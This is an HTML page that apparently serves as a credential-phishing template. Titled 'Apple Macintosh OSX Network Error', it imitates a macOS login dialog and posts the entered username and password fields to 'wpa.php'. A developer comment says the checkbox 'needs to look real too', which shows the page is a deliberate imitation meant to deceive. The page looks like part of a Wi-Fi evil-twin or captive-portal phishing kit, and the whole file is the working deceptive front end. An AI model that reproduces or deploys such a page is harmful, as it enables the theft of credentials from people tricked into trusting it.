<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Apple Macintosh OSX Network Error</title>
<style type="text/css">
<!--
.login {
	height: 340px;
	width: 500px;
	background-image: url(login_osx.png);
	background-repeat: no-repeat;
	margin-left: 100px;
	margin-top: 60px;
}
.fields {
	padding-top: 5px;
	margin: 0px;
}
.fieldsWhole {
	padding-top: 100px;
	padding-left: 210px;
	width: auto;
}
.button {
	padding-left: 372px;
	padding-top: 26px;
	margin: 0px;
}
.checkbutton {
	padding-top: 30px;
	padding-left: 205px;
}
body {
	background-image: url(bgerror.png);
	background-repeat: no-repeat;
}
-->
</style>
</head>

<body>
<div class="login">
	<form method="post" action="wpa.php" >	
    	<!-- Start the Fields Div -->
		<div class="fieldsWhole">
        	<!-- The uswername field -->
			<div class="fields">
			<input type="text" size="40" name="usr"/><br />
			</div>
            <!-- The Password Field -->
			<div class="fields">
			  <input type="password" size="40" name="passwd"/>
			  <br />
		  </div>
            <!-- The Domain Field -->
		  <div class="fields"></div>
		</div>
        <!-- Damn check button, needs to look real too! -->
		<div class="checkbutton" >
        	<input type="checkbox" />
		</div>
        <!-- Start Button Div -->
        <div class="button">
          <input type="image" src="okbutton_osx.png" />
        </div>
	</form>
</div>

</body>
</html>
